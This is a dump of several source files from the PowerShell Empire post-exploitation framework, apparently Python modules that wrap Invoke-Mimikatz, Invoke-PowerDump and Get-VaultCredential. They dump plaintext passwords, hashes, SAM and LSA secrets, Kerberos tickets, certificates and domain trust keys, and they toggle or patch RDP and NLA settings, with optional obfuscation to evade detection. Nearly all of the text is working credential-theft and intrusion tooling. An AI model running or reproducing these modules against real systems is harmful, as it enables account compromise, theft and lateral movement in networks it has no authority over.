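        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        Invoke-Mimikatz source plus a fixed command line; obfuscate=True
        obfuscates both parts.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        # crypto::capi / crypto::cng patch the providers so non-exportable keys
        # can be exported; privilege::debug is needed for that, hence NeedsAdmin.
        scriptEnd = "\nInvoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng \"crypto::certificates /systemstore:local_machine /store:root /export\"' "
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/command.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: run an operator-supplied Invoke-Mimikatz command string."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            'Name': 'Invoke-Mimikatz Command',
            'Author': ['@JosephBialek', '@gentilkiwi'],
            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "with a custom command."),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : True,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com'
            ]
        }

        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            },
            'Command' : {
                'Description' : 'Custom Invoke-Mimikatz command to run.',
                'Required' : True,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        Invoke-Mimikatz source plus  Invoke-Mimikatz -Command '"<Command>"'.
        obfuscate=True obfuscates both parts.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        # The command is embedded in a PowerShell single-quoted string, so a
        # literal ' must be doubled; otherwise it terminates the string and the
        # remainder is parsed as PowerShell rather than handed to mimikatz.
        command = str(self.options['Command']['Value']).replace("'", "''")
        scriptEnd = "\nInvoke-Mimikatz -Command '\"" + command + "\"'"
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/extract_tickets.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: Invoke-Mimikatz kerberos::list /export in base64 output mode."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            'Name': 'Invoke-Mimikatz extract kerberos tickets.',
            'Author': ['@JosephBialek', '@gentilkiwi'],
            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to extract kerberos tickets from memory in base64-encoded form."),
            'Background' : True,
            'OutputExtension' : None,
            # Lists the calling user's own tickets, so no elevation is required.
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com'
            ]
        }

        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        Invoke-Mimikatz source plus a fixed command line; obfuscate=True
        obfuscates both parts.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        # standard::base64 switches /export to base64 console output (per the
        # description) rather than .kirbi files; keep it in front of the list
        # command or the export goes to disk.
        scriptEnd = "\nInvoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/logonpasswords.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: Invoke-Mimikatz -DumpCreds (sekurlsa::logonpasswords)."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            'Name': 'Invoke-Mimikatz DumpCreds',
            'Author': ['@JosephBialek', '@gentilkiwi'],
            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to extract plaintext credentials from memory."),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : True,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com'
            ]
        }

        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        Invoke-Mimikatz source plus "Invoke-Mimikatz -DumpCreds [-Option Value ...];".
        Extra options are placed before the terminating ';' -- the previous
        version appended them after it, which would have emitted a stray token
        had any non-Agent option ever been added. obfuscate=True obfuscates
        both parts.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        args = ""
        for option, values in self.options.items():
            if option.lower() != "agent" and values['Value']:
                args += " -" + str(option) + " " + str(values['Value'])
        scriptEnd = "\nInvoke-Mimikatz -DumpCreds" + args + ";"
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/lsadump.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: Invoke-Mimikatz lsadump::lsa (/patch for all, /inject for one user)."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            'Name': 'Invoke-Mimikatz LSA Dump',
            'Author': ['@JosephBialek', '@gentilkiwi'],
            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to extract a particular user hash from memory. "
                            "Useful on domain controllers."),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : True,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com',
                "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa"
            ]
        }

        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            },
            'Username' : {
                'Description' : 'Username to extract the hash for, blank for all local passwords.',
                'Required' : False,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        Invoke-Mimikatz source plus one of
          Invoke-Mimikatz -Command '"lsadump::lsa /inject /name:<Username>"';
          Invoke-Mimikatz -Command '"lsadump::lsa /patch"';
        depending on whether Username is set. obfuscate=True obfuscates both parts.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        username = self.options['Username']['Value']
        if username != '':
            # The name lands inside a PowerShell '...' string, so a literal ' is
            # doubled; otherwise it would end the string early.
            command = "lsadump::lsa /inject /name:" + str(username).replace("'", "''")
        else:
            command = "lsadump::lsa /patch"
        scriptEnd = "\nInvoke-Mimikatz -Command '\"" + command + "\"';"
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/purge.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: Invoke-Mimikatz kerberos::purge."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            # Was 'Invoke-Mimikatz Golden Ticket', which does not describe this
            # module: it purges tickets (see Description and the command below).
            'Name': 'Invoke-Mimikatz Purge Tickets',
            'Author': ['@JosephBialek', '@gentilkiwi'],
            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to purge all current kerberos tickets from memory."),
            'Background' : True,
            'OutputExtension' : None,
            # Purges only the calling user's ticket cache, so no elevation is required.
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com',
                "https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos"
            ]
        }

        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        Invoke-Mimikatz source plus a fixed kerberos::purge command line;
        obfuscate=True obfuscates both parts.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        scriptEnd = "\nInvoke-Mimikatz -Command '\"kerberos::purge\"'"
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/sam.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'Invoke-Mimikatz SAM dump',

            'Author': ['@JosephBialek', '@gentilkiwi'],

            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to extract hashes from the Security Account Managers "
                            "(SAM) database."),

            'Background' : True,

            'OutputExtension' : None,

            'NeedsAdmin' : True,

            'OpsecSafe' : True,

            'Language' : 'powershell',

            'MinLanguageVersion' : '2',

            'Comments': [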
'http://clymb3r.wordpress.com/', 30 | 'http://blog.gentilkiwi.com', 31 | "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa" 32 | ] 33 | } 34 | 35 | # any options needed by the module, settable during runtime 36 | self.options = { 37 | # format: 38 | # value_name : {description, required, default_value} 39 | 'Agent' : { 40 | 'Description' : 'Agent to run module on.', 41 | 'Required' : True, 42 | 'Value' : '' 43 | } 44 | } 45 | 46 | # save off a copy of the mainMenu object to access external functionality 47 | # like listeners/agent handlers/etc. 48 | self.mainMenu = mainMenu 49 | 50 | for param in params: 51 | # parameter format is [Name, Value] 52 | option, value = param 53 | if option in self.options: 54 | self.options[option]['Value'] = value 55 | 56 | 57 | def generate(self, obfuscate=False, obfuscationCommand=""): 58 | 59 | # read in the common module source code 60 | moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" 61 | if obfuscate: 62 | helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) 63 | moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") 64 | try: 65 | f = open(moduleSource, 'r') 66 | except: 67 | print helpers.color("[!] 
Could not read module source path at: " + str(moduleSource)) 68 | return "" 69 | 70 | moduleCode = f.read() 71 | f.close() 72 | 73 | script = moduleCode 74 | 75 | scriptEnd = "Invoke-Mimikatz -Command " 76 | 77 | scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';" 78 | if obfuscate: 79 | scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) 80 | script += scriptEnd 81 | return script 82 | -------------------------------------------------------------------------------- /lib/modules/powershell/credentials/mimikatz/trust_keys.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Invoke-Mimikatz TrustKeys', 9 | 10 | 'Author': ['@JosephBialek', '@gentilkiwi'], 11 | 12 | 'Description': ("Runs PowerSploit's Invoke-Mimikatz function " 13 | "to extract domain trust keys from a domain controller."), 14 | 15 | 'Background' : True, 16 | 17 | 'OutputExtension' : None, 18 | 19 | 'NeedsAdmin' : True, 20 | 21 | 'OpsecSafe' : True, 22 | 23 | 'Language' : 'powershell', 24 | 25 | 'MinLanguageVersion' : '2', 26 | 27 | 'Comments': [ 28 | 'http://clymb3r.wordpress.com/', 29 | 'http://blog.gentilkiwi.com' 30 | ] 31 | } 32 | 33 | # any options needed by the module, settable during runtime 34 | self.options = { 35 | # format: 36 | # value_name : {description, required, default_value} 37 | 'Agent' : { 38 | 'Description' : 'Agent to run module on.', 39 | 'Required' : True, 40 | 'Value' : '' 41 | }, 42 | 'Method' : { 43 | 'Description' : 'Method to extract keys ("sekurlsa" or "lsadump")', 44 | 'Required' : True, 45 | 'Value' : 'lsadump' 46 | } 47 | } 48 | 49 | # save off a copy of the mainMenu object to access external functionality 50 | # like listeners/agent handlers/etc. 
51 | self.mainMenu = mainMenu 52 | 53 | for param in params: 54 | # parameter format is [Name, Value] 55 | option, value = param 56 | if option in self.options: 57 | self.options[option]['Value'] = value 58 | 59 | 60 | def generate(self, obfuscate=False, obfuscationCommand=""): 61 | 62 | # read in the common module source code 63 | moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" 64 | if obfuscate: 65 | helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) 66 | moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") 67 | try: 68 | f = open(moduleSource, 'r') 69 | except: 70 | print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) 71 | return "" 72 | 73 | moduleCode = f.read() 74 | f.close() 75 | 76 | script = moduleCode 77 | scriptEnd = "" 78 | if self.options['Method']['Value'].lower() == "sekurlsa": 79 | scriptEnd += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'" 80 | else: 81 | scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'" 82 | if obfuscate: 83 | scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) 84 | script += scriptEnd 85 | return script 86 | -------------------------------------------------------------------------------- /lib/modules/powershell/credentials/powerdump.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Invoke-PowerDump', 9 | 10 | 'Author': ['DarkOperator', 'winfang', 'Kathy Peters', 'ReL1K'], 11 | 12 | 'Description': "Dumps hashes from the local system using Posh-SecMod's Invoke-PowerDump", 13 | 14 | 'Background' : True, 15 | 16 | 'OutputExtension' : None, 17 | 18 | 'NeedsAdmin' : True, 19 | 20 | 'OpsecSafe' : True, 21 | 22 | 'Language' : 
'powershell', 23 | 24 | 'MinLanguageVersion' : '2', 25 | 26 | 'Comments': [ 27 | 'https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1' 28 | ] 29 | } 30 | 31 | # any options needed by the module, settable during runtime 32 | self.options = { 33 | # format: 34 | # value_name : {description, required, default_value} 35 | 'Agent' : { 36 | 'Description' : 'Agent to run module on.', 37 | 'Required' : True, 38 | 'Value' : '' 39 | } 40 | } 41 | 42 | # save off a copy of the mainMenu object to access external functionality 43 | # like listeners/agent handlers/etc. 44 | self.mainMenu = mainMenu 45 | 46 | for param in params: 47 | # parameter format is [Name, Value] 48 | option, value = param 49 | if option in self.options: 50 | self.options[option]['Value'] = value 51 | 52 | 53 | def generate(self, obfuscate=False, obfuscationCommand=""): 54 | 55 | # read in the common module source code 56 | moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-PowerDump.ps1" 57 | if obfuscate: 58 | helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) 59 | moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") 60 | try: 61 | f = open(moduleSource, 'r') 62 | except: 63 | print helpers.color("[!] 
Could not read module source path at: " + str(moduleSource)) 64 | return "" 65 | 66 | moduleCode = f.read() 67 | f.close() 68 | 69 | script = moduleCode 70 | 71 | scriptEnd = "Invoke-PowerDump" 72 | if obfuscate: 73 | scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) 74 | script += scriptEnd 75 | return script 76 | -------------------------------------------------------------------------------- /lib/modules/powershell/credentials/vault_credential.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Get-VaultCredential', 9 | 10 | 'Author': ['@mattifestation'], 11 | 12 | 'Description': ("Runs PowerSploit's Get-VaultCredential to display " 13 | "Windows vault credential objects including " 14 | "cleartext web credentials."), 15 | 16 | 'Background' : True, 17 | 18 | 'OutputExtension' : None, 19 | 20 | 'NeedsAdmin' : True, 21 | 22 | 'OpsecSafe' : True, 23 | 24 | 'Language' : 'powershell', 25 | 26 | 'MinLanguageVersion' : '2', 27 | 28 | 'Comments': [ 29 | 'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1' 30 | ] 31 | } 32 | 33 | # any options needed by the module, settable during runtime 34 | self.options = { 35 | # format: 36 | # value_name : {description, required, default_value} 37 | 'Agent' : { 38 | 'Description' : 'Agent to run module on.', 39 | 'Required' : True, 40 | 'Value' : '' 41 | } 42 | } 43 | 44 | # save off a copy of the mainMenu object to access external functionality 45 | # like listeners/agent handlers/etc. 
46 | self.mainMenu = mainMenu 47 | 48 | for param in params: 49 | # parameter format is [Name, Value] 50 | option, value = param 51 | if option in self.options: 52 | self.options[option]['Value'] = value 53 | 54 | 55 | def generate(self, obfuscate=False, obfuscationCommand=""): 56 | 57 | # read in the common module source code 58 | moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Get-VaultCredential.ps1" 59 | if obfuscate: 60 | helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) 61 | moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") 62 | try: 63 | f = open(moduleSource, 'r') 64 | except: 65 | print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) 66 | return "" 67 | 68 | moduleCode = f.read() 69 | f.close() 70 | 71 | script = moduleCode 72 | 73 | 74 | scriptEnd = "Get-VaultCredential" 75 | if obfuscate: 76 | scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) 77 | script += scriptEnd 78 | return script 79 | -------------------------------------------------------------------------------- /lib/modules/powershell/management/disable_rdp.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Disable-RDP', 9 | 10 | 'Author': ['@harmj0y'], 11 | 12 | 'Description': ("Disables RDP on the remote machine."), 13 | 14 | 'Background' : False, 15 | 16 | 'OutputExtension' : None, 17 | 18 | 'NeedsAdmin' : True, 19 | 20 | 'OpsecSafe' : False, 21 | 22 | 'Language' : 'powershell', 23 | 24 | 'MinLanguageVersion' : '2', 25 | 26 | 'Comments': [ ] 27 | } 28 | 29 | # any options needed by the module, settable during runtime 30 | self.options = { 31 | # format: 32 | # value_name : {description, required, default_value} 33 | 'Agent' : 
{
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell one-liner that disables RDP on the agent host.

        Args:
            obfuscate: when True the finished script is passed through
                helpers.obfuscate before being returned.
            obfuscationCommand: forwarded to helpers.obfuscate unchanged.

        Returns:
            The script string. Nothing is read from disk here, so unlike the
            file-backed modules there is no failure path that returns "".
        """

        # command to disable RDP: sets fDenyTSConnections=1 under the Terminal Server key
        script = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f;"
        # command to turn NLA back on (UserAuthentication=1), but only if the
        # preceding *disable* succeeded -- $? is the status of the last command.
        # Both writes go through reg.exe against the two values a defender
        # watches for RDP-state tampering (fDenyTSConnections, UserAuthentication).
        script += " if ($?) { $null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }"
        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
        return script

-------------------------------------------------------------------------------- /lib/modules/powershell/management/enable_multi_rdp.py: --------------------------------------------------------------------------------
from lib.common import helpers

class Module:

    def __init__(self, mainMenu, params=[]):
        # NOTE(review): params=[] is a mutable default; it is only iterated,
        # never mutated, so it is harmless here but non-idiomatic.

        self.info = {
            'Name': 'Invoke-Mimikatz Multirdp',

            'Author': ['@gentilkiwi', '@JosephBialek'],

            'Description': ("[!] WARNING: Experimental! 
Runs PowerSploit's Invoke-Mimikatz " 13 | "function to patch the Windows terminal service to allow " 14 | "multiple users to establish simultaneous RDP connections."), 15 | 16 | 'Background' : True, 17 | 18 | 'OutputExtension' : None, 19 | 20 | 'NeedsAdmin' : True, 21 | 22 | 'OpsecSafe' : False, 23 | 24 | 'Language' : 'powershell', 25 | 26 | 'MinLanguageVersion' : '2', 27 | 28 | 'Comments': [ 29 | 'http://blog.gentilkiwi.com', 30 | 'http://clymb3r.wordpress.com/' 31 | ] 32 | } 33 | 34 | # any options needed by the module, settable during runtime 35 | self.options = { 36 | # format: 37 | # value_name : {description, required, default_value} 38 | 'Agent' : { 39 | 'Description' : 'Agent to run module on.', 40 | 'Required' : True, 41 | 'Value' : '' 42 | } 43 | } 44 | 45 | # save off a copy of the mainMenu object to access external functionality 46 | # like listeners/agent handlers/etc. 47 | self.mainMenu = mainMenu 48 | 49 | for param in params: 50 | # parameter format is [Name, Value] 51 | option, value = param 52 | if option in self.options: 53 | self.options[option]['Value'] = value 54 | 55 | 56 | def generate(self, obfuscate=False, obfuscationCommand=""): 57 | 58 | # read in the common module source code 59 | moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" 60 | if obfuscate: 61 | helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) 62 | moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") 63 | try: 64 | f = open(moduleSource, 'r') 65 | except: 66 | print helpers.color("[!] 
Could not read module source path at: " + str(moduleSource)) 67 | return "" 68 | 69 | moduleCode = f.read() 70 | f.close() 71 | 72 | script = moduleCode 73 | 74 | scriptEnd = "Invoke-Mimikatz -Command '\"ts::multirdp\"';" 75 | if obfuscate: 76 | scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) 77 | script += scriptEnd 78 | return script 79 | -------------------------------------------------------------------------------- /lib/modules/powershell/management/enable_rdp.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Enable-RDP', 9 | 10 | 'Author': ['@harmj0y'], 11 | 12 | 'Description': ("Enables RDP on the remote machine and adds a firewall exception."), 13 | 14 | 'Background' : False, 15 | 16 | 'OutputExtension' : None, 17 | 18 | 'NeedsAdmin' : True, 19 | 20 | 'OpsecSafe' : False, 21 | 22 | 'Language' : 'powershell', 23 | 24 | 'MinLanguageVersion' : '2', 25 | 26 | 'Comments': [ ] 27 | } 28 | 29 | # any options needed by the module, settable during runtime 30 | self.options = { 31 | # format: 32 | # value_name : {description, required, default_value} 33 | 'Agent' : { 34 | 'Description' : 'Agent to run module on.', 35 | 'Required' : True, 36 | 'Value' : '' 37 | } 38 | } 39 | 40 | # save off a copy of the mainMenu object to access external functionality 41 | # like listeners/agent handlers/etc. 
42 | self.mainMenu = mainMenu 43 | 44 | for param in params: 45 | # parameter format is [Name, Value] 46 | option, value = param 47 | if option in self.options: 48 | self.options[option]['Value'] = value 49 | 50 | 51 | def generate(self, obfuscate=False, obfuscationCommand=""): 52 | 53 | # command to enable RDP 54 | script = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f;" 55 | # command to add the firewall exception only if the enable runs successfully 56 | script += " if($?) {$null = netsh firewall set service type = remotedesktop mod = enable;" 57 | # command to disable NLA 58 | script += "$null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f }" 59 | if obfuscate: 60 | script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) 61 | return script 62 | -------------------------------------------------------------------------------- /lib/modules/powershell/management/get_domain_sid.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Get-DomainSID', 9 | 10 | 'Author': ['@harmj0y'], 11 | 12 | 'Description': ('Returns the SID for the current of specified domain.'), 13 | 14 | 'Background' : True, 15 | 16 | 'OutputExtension' : None, 17 | 18 | 'NeedsAdmin' : False, 19 | 20 | 'OpsecSafe' : True, 21 | 22 | 'Language' : 'powershell', 23 | 24 | 'MinLanguageVersion' : '2', 25 | 26 | 'Comments': [ ] 27 | } 28 | 29 | # any options needed by the module, settable during runtime 30 | self.options = { 31 | # format: 32 | # value_name : {description, required, default_value} 33 | 'Agent' : { 34 | 'Description' : 'Agent to run module on.', 35 | 'Required' : True, 36 | 'Value' : '' 37 | }, 38 | 